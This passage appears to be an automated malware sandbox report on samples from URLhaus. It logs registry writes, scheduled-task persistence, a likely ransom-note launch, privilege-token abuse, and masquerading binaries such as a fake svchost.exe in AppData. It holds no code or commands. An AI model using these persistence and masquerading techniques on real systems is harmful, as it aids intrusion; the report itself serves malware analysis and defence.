Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{534F5323-3569-4F42-919D-1E1CF93E5BF6}\VersionIndependentProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2D363682-561D-4C3A-81C6-F2F82107562A}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.Update3WebMachineFallback\CLSID\ = "{598FE0E5-E02D-465D-9A9D-37974A28FD42}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221}\ = "IAppCommand" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\Elevation\IconReference = "@C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\goopdate.dll,-1004" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}\LocalizedString = "@C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\goopdate.dll,-3000" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.OnDemandCOMClassMachineFallback\CurVer\ = "GoogleUpdate.OnDemandCOMClassMachineFallback.1.0" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{598FE0E5-E02D-465D-9A9D-37974A28FD42}\ELEVATION C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ADDF22CF-3E9B-4CD7-9139-8169EA6636E4}\ = "Google Update Policy Status Class" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF} C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\NumMethods\ = "4" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544}\NumMethods\ = "12" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3A47570-0A85-4AEA-8270-529D47899603} C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3D05F64F-71E3-48A5-BF6B-83315BC8AE1F} C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\NumMethods\ = "24" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{7DE94008-8AFD-4C70-9728-C6FBFFF6A73E}\VERSIONINDEPENDENTPROGID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\NumMethods\ = "7" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ = "IProgressWndEvents" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\VersionIndependentProgID\ = "GoogleUpdate.Update3WebMachine" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.OnDemandCOMClassMachineFallback\ = "Google Update Legacy On Demand" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.PolicyStatusMachineFallback\ = "Google Update Policy Status Class" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4E223325-C16B-4EEB-AEDC-19AA99A237FA} C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5} C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF}\NumMethods\ = "10" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ = "IJobObserver" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ThreadingModel = "Both" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}\ = "Google Update Broker Class Factory" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6365D39F-2E73-4837-BC59-2014AAA20FA7}\InProcServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\psmachine_64.dll" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\LOCALSERVER32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414} C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\LOCALSERVER32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\LocalServer32\ = "\"C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\GoogleUpdateOnDemand.exe\"" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{31AC3F11-E5EA-4A85-8A3D-8E095A39C27B} C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ping.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\random.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\random.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\random.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\http.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\http.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
